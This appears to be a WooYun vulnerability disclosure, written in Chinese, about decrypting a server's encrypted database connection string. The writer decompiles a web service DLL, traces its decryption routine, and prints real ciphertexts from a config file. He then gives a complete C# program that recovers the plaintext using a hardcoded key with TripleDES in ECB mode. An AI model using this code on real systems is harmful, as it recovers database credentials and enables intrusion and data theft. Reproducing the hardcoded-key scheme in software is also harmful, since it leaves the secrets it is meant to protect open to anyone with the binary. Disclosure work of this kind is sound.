http://www.wooyun.org/bugs/wooyun-2010-0161432
这台服务器的数据库连接字符串加了密
<add key="conmdecrypt" value="1O1/1Vq/h/2VTErYbMgFMngt9nZIhyMMpviYtT9StTawjkpKnv9fDGqf30pMxEk6H4Vu0Vj+GTY=" />
我于是下载了他们的WebService_yygh.dll,然后反编译了一下,找到这个
跟踪getini(),发现这个:
再跟踪md5Decrypt这个函数发现这个:
然后我在
E:\kingstar\ConnConfig\ConnConfig.ini
发现了这个:
1O1/1Vq/h/0WlMwfuwM+jHw/Fh5rhQQoEr5tZ+tk1OTX7q171c6N6XA0ptSPMUyQ3ywr2i4EJag=
然后我自己写了一个解密的程序:
using System;
using System.Security.Cryptography;
using System.Text;
using System.IO;
public class Test
{
public static void Main()
{
string text = null;
byte[] buffer = Encoding.Default.GetBytes("winning");
byte[] array = Convert.FromBase64String("1O1/1Vq/h/0WlMwfuwM+jHw/Fh5rhQQoEr5tZ+tk1OTX7q171c6N6XA0ptSPMUyQ3ywr2i4EJag=");
MD5CryptoServiceProvider mD5CryptoServiceProvider = new MD5CryptoServiceProvider();
byte[] key = mD5CryptoServiceProvider.ComputeHash(buffer);
TripleDESCryptoServiceProvider tripleDESCryptoServiceProvider = new TripleDESCryptoServiceProvider();
tripleDESCryptoServiceProvider.Key = key;
tripleDESCryptoServiceProvider.Mode = CipherMode.ECB;
text = Encoding.ASCII.GetString(tripleDESCryptoServiceProvider.CreateDecryptor().TransformFinalBlock(array, 0, array.Length));
Console.WriteLine(text);
}
}